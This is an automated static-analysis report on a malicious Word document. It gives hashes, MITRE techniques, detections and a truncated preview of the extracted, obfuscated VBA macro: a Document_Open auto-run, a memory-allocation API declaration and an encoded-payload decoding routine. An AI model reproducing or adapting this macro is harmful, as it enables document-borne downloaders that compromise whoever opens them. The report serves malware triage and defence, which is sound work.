Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ccb66b31d66f8a98…

MALICIOUS

Office (OLE)

Size: 307.5 KB | Created: 2018-01-30 15:45:00 | Authoring application: Microsoft Office Word | First seen: 2018-02-07
MD5: b1421f67a9b12e14d3551ca71e022021 | SHA-1: 65473f3df2b3e165979506941554f43336693b3b | SHA-256: ccb66b31d66f8a9864b5ca68793561ef2c5d251a3a3043966fae9c56d53153f9
Risk Score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a Document_Open VBA macro, which is a common technique for initiating malicious actions upon document opening. The VBA code appears obfuscated and utilizes a Pmt function, suggesting it attempts to download and execute a payload. The presence of the 'roar' function declaration aliased to 'NtAllocateVirtualMemory' further indicates memory manipulation, often used for payload execution. The ClamAV detection 'Doc.Downloader.Macro-6539595-0' directly supports the downloader functionality.

Heuristics (4)

  • ClamAV: Doc.Downloader.Macro-6539595-0 (severity: critical; tag: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected (severity: medium; 1 related finding; tag: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high; tag: OLE_VBA_DOCOPEN)
    Document_Open macro
  • Embedded URL (severity: info; tag: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source) | Size: 10225 bytes
SHA-256: 3b4c66a8546296edc51a9b97d59b70aa7a37e8b92db799b1cd532247a5c0869a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Private Sub Document_Open()
epigaea = blowgun
mesocricetus
beheaded = 31 + 49
Pmt 0, beheaded, 28969, 25578, 7
End Sub


Attribute VB_Name = "fauna"
Attribute VB_Base = "0{C69F4BC8-3ED2-470C-9650-8EE9B73FC092}{88E25E7D-6199-45AF-9843-1F51BA910B75}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "dishonesty"
#If (56 - 24 + 368 + 59 - 76 + 317) > ((29 - 106 + 397) - (109 - 17 + 448) * 1) And ((18 - 25 + 35) - (21 - 62 + 69)) * 2 < (Win64) Then
Public Declare PtrSafe Function roar _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (lyddite As LongPtr, millettia As LongPtr, ByVal statuvolent As LongPtr, allonesByVal As LongPtr, scoff As LongPtr, ByVal fulllength As LongPtr) As LongPtr
#End If
Function alchemy()
athanor = 112 - 97 + 50
Dim sens(255) As Byte
For i = athanor To 90 + 1
sens(athanor) = athanor - 65
athanor = athanor + 1
If athanor > 90 + 1 Then Exit For
Next
athanor = 40 + 8
For i = athanor To 50 + 8
sens(athanor) = athanor + 4
athanor = athanor + 1
If athanor > 50 + 8 Then Exit For
Next
athanor = 90 + 7
For i = athanor To 120 + 3
sens(athanor) = athanor - 71
athanor = athanor + 1
If athanor > 120 + 3 Then Exit For
Next
sens(47) = 60 + 3
athanor = 40 + 3
sens(athanor) = 60 + 2
alchemy = sens
End Function





Attribute VB_Name = "farhat"
Function balas(forefront) As String
Dim converse As Integer
Dim armchair(63) As Long
Dim airpipe() As Byte
Dim contraire(6962) As Byte
Dim autoregulation As String
Dim reveler(63) As Long
Dim amyloid As Long
Dim crescentia As Long
Dim bunchberry(63) As Long
Dim britisher As Long
Dim antimalarial As Long
flit = 23 - 107 + 147
andrena = 117 - 25 + 16711588
acerate = 76 - 89 + 4045
enceliopsis = 87 - 71 + 4080
Dim iwo As String

harvesthome = 8 - 32 + 280
gloveless = 112 - 108 + 65276
breadfruit = 96 - 97 + 65537
Dim orions As Byte

infelicitously = 67 - 111 + 258092
jejunostomy = 86 - 47 + 25
uncomplicated = 92 - 47 + 16515027
acned = 57 - 80 + 262167
deflationary = 34 - 1 + 222
Dim atomization As Long

Dim carat As Variant
apicius = 123 - 12 + 7732
Dim blut() As Byte
blut = VBA.StrConv(forefront, 120 + 8)
catalectin = 23 + 46
 Pmt 0, catalectin, 3821, 58392, 7

acromphalus = 7843
ludere = vbKeyShift - 12
For insulation = 0 To acromphalus
If insulation Mod 2 = 0 Then
blut(insulation) = blut(insulation) - ludere
Else
blut(insulation) = blut(insulation) - (ludere - 1)
End If
Next insulation
cogent = 48 + 56
 Pmt 0, cogent, 14249, 10181, 2

converse = 0
causans = alchemy
For amyloid = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
armchair(amyloid) = swifter(amyloid, jejunostomy, 60)
bunchberry(amyloid) = swifter(amyloid, enceliopsis, 60)
reveler(amyloid) = swifter(amyloid, acned, 60)
Next amyloid
impaction = 6 + 28
 Pmt 0, impaction, 38355, 55700, 6

airpipe = blut
colliquefaction = 109 - 82 - 23
gammer = 18 + 42
 Pmt 0, gammer, 18895, 35443, 5

hardening = 42 - 14 - 25
bidirectional = "shortish"

abiding = hardening + 1
divine = 82 - 37 - 43
For crescentia = 0 To acromphalus
bilimbi = airpipe(crescentia)
peekaboo = airpipe(crescentia + 2)
apparentness = bunchberry(causans(airpipe(crescentia + 1)))
pantaloons = armchair(causans(peekaboo)) + causans(airpipe(crescentia + hardening))
britisher = reveler(causans(bilimbi)) + apparentness + pantaloons
amyloid = swifter(britisher, andrena, 52)
contraire(antimalarial) = swifter(amyloid, breadfruit, 42)
amyloid = swifter(britisher, gloveless, 52)
contraire(antimalarial + 1) = swifter(amyloid, harvesthome, 42)
contraire(antimalarial + divine) = swifter(briti
... (truncated)